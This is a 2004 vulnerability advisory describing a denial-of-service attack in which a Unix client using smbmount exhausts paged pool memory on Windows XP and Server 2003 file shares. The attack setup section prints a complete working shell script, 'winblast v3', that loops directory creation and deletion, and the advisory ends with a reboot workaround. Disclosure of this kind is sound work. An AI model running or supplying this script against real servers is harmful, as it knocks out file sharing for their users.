Announced: 2004-02-02 Type: Denial of Service Attack on Windows Impact: smbmount can stop Windows from sharing files Writer: Daniel Kabs, Germany (daniel.kabs@gmx.de) Credits: Thanks to Steve Ladjabi (steve.ladjabi@web.de) Contents: 1. Abstract 2. Affected Systems 3. Attack Setup 4. Symptoms 5. Workaround 1. Abstract A security vulnerability of "Windows XP" and "Windows 2003 Server" has been found. Theses systems are open to a denial of service attack. If they share folders to a Unix client that is using smbmount (part of the Samba suite), any user on the client who has permissions to create directories on the mounted share can stop the Windows system from serving files. The attack induces a memory shortage on the Windows system by creating directories in a special way. 2. Affected Systems This denial of service attack has been carried out successfully against - Microsoft Windows XP Professional, Service Pack 1 - Microsoft Windows Server 2003 Microsoft Windows 2000 Prof. and earlier versions of Windows are not affected by this attack. 3. Attack Setup The attack was carried out successfully using - "Debian Linux", smbmount 3.0.0beta2 - "Suse Linux 8.2", smbmount version 2.2.2 as Unix clients The Windows system shares a folder. The Unix client mounts the share using smbmount. A user on the Unix client has write/create permissions to it the shared folder. The user on the client creates and deletes a lot of directories on the mounted share using the following script: #!/bin/sh # winblast v3 - DoS on WinXP, Win2003Srv # 2003-12-04 Steve Ladjabi count=0 # using 'pathcount' directories pathcount=1000 echo running \'winblast v3\' with $pathcount files in loop ... while [ 1 ]; do p=$((pathcount*2-1)) stop=$((pathcount-1)) while [ "$p" != "$stop" ]; do dirname=wbst$p # delete old directory if it exists, exit on any error if [ -d $dirname ]; then rmdir $dirname || exit 3 fi; # generating directory and exit on any error mkdir $dirname || exit 1 p=$((p-1)) count=$((count+1)) done; echo $count directories generated ... done; #-- end -- The script will create 1000 directories and then takes turns deleting and re-creating them. There will be no more than those 1000 directories at any time! Every time a directory is created, the Windows system allocates paged pool memory. This memory is not freed although the directory gets deleted. After having created and deleted 3.5 millions directories, the Windows system's paged pool memory has been depleted and it denies access to the share. One tested Windows XP system managed to take 5.8 millions directories until it stopped serving. This happens about 4 hours after the attack was started. 4. Symptoms When the Windows system suddenly fails, it ceases serving, i.e. users can not access files nor list directory contents any more from the client. Any client will have lost its access the the share. On the Windows system the event log shows an error with event id 2020. Additionally, the Administrator of the Windows system can neither unshare the folder nor kill the session due to the lack of memory resources. Trying to open the managment console will result in error messages to this effect. Executing the command "net share /delete" fails due to the memory shortage. The only way to get the Windows system working again is to reboot it. Putting more RAM in the maching running Windows will not help as the paged pool memory is limited to 343MB. (See MS KB article Q312362). 5. Workaround Administrator should schedule a daily reboot of the Windows system.